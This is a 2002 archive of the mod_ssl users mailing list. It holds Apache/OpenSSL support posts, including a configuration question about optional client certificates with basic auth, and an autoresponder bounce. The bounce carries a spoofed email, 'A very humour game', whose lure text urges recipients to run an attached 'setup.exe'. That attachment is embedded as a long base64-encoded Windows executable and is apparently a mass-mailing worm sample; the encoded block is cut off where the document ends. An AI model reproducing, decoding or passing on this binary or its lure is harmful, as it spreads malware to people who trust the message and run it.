>>with Win NT, for about 80-160 bucks you can come back from the dark side...
>>
> I have no choice - I must use windows NT - because of the customer / 
> the project.
>
> I would appreciate to work on LINUX but I CAN NOT !
>
>>The porters can help you, because they are very patient souls who want to
>>see the market expand for Apache and mod_ssl.  
>>
> So maybe one of the windows porters has available one binary of the 
> stuff they ported?
>
>
> Johannes
>
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 18 22:31:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA18320; Thu, 18 Apr 2002 22:30:34 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from netopf.harvard.edu id WAA18277; Thu, 18 Apr 2002 22:29:44 +0200 (MET DST)
Received: from navajo (dhcp001.harvard.edu [128.103.209.201])
	by netopf.harvard.edu (8.11.6/8.11.6) with SMTP id g3IKThk31547
	for ; Thu, 18 Apr 2002 16:29:43 -0400
From: "David LaPorte" 
To: 
Subject: Optional client certs or basic auth
Date: Thu, 18 Apr 2002 16:29:42 -0400
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "David LaPorte" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello all,

I'm trying to setup a website that allows client certs if a client has one,
but uses HTTP basic auth over SSL otherwise.  Using the example at:

http://www.modssl.org/docs/2.8/ssl_howto.html#ToC10

as a guide, I came up with the following:

###

SSLCACertificatePath /etc/httpd/conf/ssl.crt
SSLCACertificateFile /etc/httpd/conf/ssl.crt/ca.crt
SSLCertificateChainFile /etc/httpd/conf/ssl.crt/ca.crt
SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt
SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key
SSLVerifyClient optional
SSLVerifyDepth 2
SSLOptions +FakeBasicAuth +StrictRequire



    Satisfy any

    Order deny,allow
    Deny from all
    Allow from 10.1.1
    Allow from localhost

    AuthType Basic
    AuthUserFile /etc/httpd/conf/users
    AuthName "Test"
    Require valid-user


###

I moved the SSL-related lines out of the Location container to avoid these
errors:

[Tue Apr  9 09:07:54 2002] [error] mod_ssl: SSL error on writing data
(OpenSSL library error follows)
[Tue Apr  9 09:07:54 2002] [error] OpenSSL:
error:1409E0E5:lib(20):func(158):reason(229)
[Tue Apr  9 09:07:56 2002] [error] mod_ssl: Cannot find peer certificate
chain

Client authentication works fine, but if I cancel out of the client cert
dialog on the browser I'm allowed full access to the site - I am not
prompted for a username/password.  Am I missing something?  Looking through
past mailing list postings, it looks like this may not be possible, but the
example I mentioned above seems to state that it is.


thanks!
David LaPorte

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Apr 19 03:09:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id DAA06270; Fri, 19 Apr 2002 03:08:43 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id DAA06213; Fri, 19 Apr 2002 03:07:59 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 984E84CE5F1; Fri, 19 Apr 2002 03:07:58 +0200 (CEST)
Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org
	id g3IJZ3T39220; Thu, 18 Apr 2002 21:35:03 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from apache.org id UAA11275; Thu, 18 Apr 2002 20:55:26 +0200 (MET DST)
Received: (qmail 33398 invoked by uid 500); 18 Apr 2002 18:55:18 -0000
Date: 18 Apr 2002 18:55:18 -0000
Message-ID: <20020418185518.33397.qmail@apache.org>
Content-Type: multipart/mixed; boundary="----------=_1019156118-33395-0"
Content-Transfer-Encoding: binary
Mime-Version: 1.0
X-Mailer: MIME-tools 5.409 (Entity 5.404)
From: Apache Autoresponder 
To: modssl-users 
References: <200204181848.g3IIm8p01183@linux1.ecpcontabil.com.br>
In-Reply-To: <200204181848.g3IIm8p01183@linux1.ecpcontabil.com.br>
Subject: Re: A very  humour game
X-Remark: Automatic response generated by autoresponder r1.15.2
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Apache Autoresponder 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format...

------------=_1019156118-33395-0
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary

Thank you for your mail.

This reply has been automatically generated; your message has
NOT been read by a human being.  We apologise for this impersonal
response, but the volume of mail we receive and the volunteer
nature of our organisation forces us to do things this way.

Please see .
Direct your questions to the mailing lists or newsgroups mentioned
on that page.  (This is called the 'preFAQ page'.)

If you have a technical issue that isn't addressed by the preFAQ
page or any of the resources it lists, please direct your questions
to the appropriate mailing list(s).

If you have a non-technical issue and you need to contact a human
being about something involving any of the Apache software, please
see below.

NOTE: If your message concerns a technical question or issue,
we ask that you PLEASE check the page of resources referenced
above -- including directing your questions about a specific
package to that package's mailing lists.  If your issue is
addressed by one of the resources listed on the preFAQ page,
and you send it to the address below anyway, it will probably
be ignored  -- or you may receive a very terse and irritated
reply.  Again, the voluntary nature of our organisation precludes
us from repeating information which we have already made available;
we just don't have time for it.

Now, if you absolutely MUST contact a real person, please send
a message to .

** NOTE **
If your issue *is* addressed by the preFAQ page, and you send
a message to the above address anyway, IT WILL BE IGNORED.
-- 
Ken Coar, Director
Apache Software Foundation

------------=_1019156118-33395-0
Content-Type: message/rfc822
Content-Disposition: inline

Received: (qmail 33194 invoked from network); 18 Apr 2002 18:54:44 -0000
Received: from 200-207-45-98.dsl.telesp.net.br (HELO linux1.ecpcontabil.com.br) (200.207.45.98)
  by daedalus.apache.org with SMTP; 18 Apr 2002 18:54:44 -0000
Received: (from root@localhost)
	by linux1.ecpcontabil.com.br (8.11.1/8.11.1) id g3IImAG01259
	for ; Thu, 18 Apr 2002 15:48:10 -0300
Received: from Yznqfnv (gilberto [10.10.0.3])
	by linux1.ecpcontabil.com.br (8.11.1/8.11.1) with SMTP id g3IIm8p01183
	for ; Thu, 18 Apr 2002 15:48:08 -0300
Date: Thu, 18 Apr 2002 15:48:08 -0300
Message-Id: <200204181848.g3IIm8p01183@linux1.ecpcontabil.com.br>
From: modssl-users 
To: apache@apache.org
Subject: A very  humour game
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=J4JcQNsg0277gz
X-AntiVirus: scanned for viruses by AMaViS 0.2.1 (http://amavis.org/)
X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N

--J4JcQNsg0277gz
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable



This is a special  humour game

This game is my first work.

You're the first player.

I wish you would enjoy it.

--J4JcQNsg0277gz
Content-Type: application/octet-stream;
	name=setup.exe
Content-ID: 
Content-Transfer-Encoding: base64

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFt
IGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAAYmX3gXPgT
s1z4E7Nc+BOzJ+Qfs1j4E7Pf5B2zT/gTs7TnGbNm+BOzPucAs1X4E7Nc+BKz
JfgTs7TnGLNO+BOz5P4Vs134E7NSaWNoXPgTswAAAAAAAAAAUEUAAEwBBAC4
jrc8AAAAAAAAAADgAA8BCwEGAADAAAAAkAgAAAAAAFiEAAAAEAAAANAAAAAA
QAAAEAAAABAAAAQAAAAAAAAABAAAAAAAAAAAYAkAABAAAAAAAAACAAAAAAAQ
AAAQAAAAABAAABAAAAAAAAAQAAAAAAAAAAAAAAAg1gAAZAAAAABQCQAQAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANAAAOwBAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAudGV4dAAAAEq6AAAAEAAAAMAAAAAQAAAAAAAAAAAA
AAAAAAAgAABgLnJkYXRhAAAiEAAAANAAAAAgAAAA0AAAAAAAAAAAAAAAAAAA
QAAAQC5kYXRhAAAAbF4IAADwAAAAUAAAAPAAAAAAAAAAAAAAAAAAAEAAAMAu
cnNyYwAAABAAAAAAUAkAEAAAAABAAQAAAAAAAAAAAAAAAABAAABAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AFWL7IPsFItFEFNWM/ZXM9uJdeyJdfiJRfA7dRAPjW8BAACLRfBqA1o7wolV
9H0DiUX0i030uD09PT2Nffxmq4XJqn4Vi0UIjX38A/CLwcHpAvOli8gjyvOk
ik38isHA6AKF24hF/3Qmi30Uhf9+J4vDi3UMK0X4mff/hdJ1G8YEMw1DxgQz
CkODRfgC6wuLdQyLfRTrA4t1DA+2Rf+LFTDwQACA4QPA4QSKBBCIBDOKRf2K
0EPA6gQCyoXbdCGF/34di8MrRfiZ9/+F0nUOxgQzDUPGBDMKQ4NF+AKKRf2L
FTDwQAAkDw+2ycDgAooMEYgMM4pN/orRQ8DqBgLChduIRf90HoX/fhqLwytF
+Jn3/4XSdQ7GBDMNQ8YEMwpDg0X4Ag+2Rf+LFTDwQACKBBCIBDNDg330An8F
xkQz/z2A4T+F23Qehf9+GovDK0X4mff/hdJ1DsYEMw1DxgQzCkODRfgCD7bB
iw0w8EAAigQIiAQzQ4N99AF/BcZEM/89i3Xsg8YDg23wA4l17OmI/v//X4vD
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
